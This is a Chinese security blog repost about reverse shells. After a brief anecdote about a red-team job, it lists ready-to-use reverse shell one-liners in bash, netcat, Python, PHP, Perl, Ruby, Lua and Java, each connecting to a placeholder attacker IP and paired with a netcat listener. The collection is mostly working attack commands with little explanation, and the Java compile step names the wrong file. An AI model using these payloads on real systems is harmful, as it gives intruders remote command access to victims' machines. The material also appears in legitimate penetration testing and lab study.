一场误导引起的反弹Shell

admin 2025年1月6日11:16:29评论3 views字数 1773阅读5分54秒阅读模式
  • 前言

    近期一直在聊的师傅,但是我记得师傅是bt,怎么搞了个rt的活了,但是今早师傅在群里发了一句,我们好像已经不用打了,堡垒机都被拿下了!!我想,师傅这是想早点下班吧,不仅拿bt的钱钱,还拿了rt的钱钱,师傅牛逼!!师傅的情况是这样子的,可以进行命令执行,但是不能搞反弹shell,与代理毫无关系,聊的时候,思路就不对了。给师傅带跑了>.<

一场误导引起的反弹Shell

攻击机:nc -lvp 8989受害机:bash -i >& /dev/tcp/攻击者ip/8989 0>&1
  • Nc反弹shell

受害机:nc -e /bin/bash 攻击者ip 8989攻击机:nc -lvp 8989
  • Python反弹shell

受害机:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击者ip",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'攻击机:nc -lvp 8989
  • Php反弹shell

攻击机:nc -lvp 8989受害机:php73 -r '$sock=fsockopen("攻击者ip",8989);exec("/bin/sh -i <&3 >&3 2>&3");'
  • Perl反弹shell

受害者:perl -e 'use Socket;$i="攻击者ip";$p=8989;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'攻击者:nc -lvp 8989
  • Ruby反弹shell

受害者:ruby -rsocket -e'f=TCPSocket.open("攻击者ip",8989).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'攻击者:nc -lvp 8989
  • Lua反弹shell

受害者:lua -e "require('socket');require('os');t=socket.tcp();t:connect('攻击者ip','8989');os.execute('/bin/sh -i <&3 >&3 2>&3');"攻击者:nc -lvp 8989
  • java反弹

public class Revs {/**    * @param args    * @throws Exception     */public static void main(String[] args) throws Exception {        // TODO Auto-generated method stub        Runtime r = Runtime.getRuntime();        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/攻击者ip/8989;cat <&5 | while read line; do $line 2>&5 >&5; done"};        Process p = r.exec(cmd);        p.waitFor();    }}保存为Revs.java文件,编译执行 javac test.javajava test攻击者:nc -lvp 8989
  • 微信群介绍

  本公众号只用来记录一些自己在安全道路上所学所想所看,更多的是技术的互相交流,工具及部分不方便内容均放在知识星球中,知识星球加入渠道,加入微信群,互相吹水,互相学习,互相进步!!

一场误导引起的反弹Shell

  • 总结

  已经很久没有打过rt或者是做过大型靶场了,对于思路上已经是淡了很多,好在有各大师傅之间的互相学习交流,共同进步,让我复习了一遍反弹Shell的姿势,还是得向大师傅说声抱歉,自己还是有好多需要进行总结、进步。

一场误导引起的反弹Shell

原文始发于微信公众号(Undoubted Security):一场误导引起的反弹Shell

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月6日11:16:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一场误导引起的反弹Shellhttps://cn-sec.com/archives/1834156.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息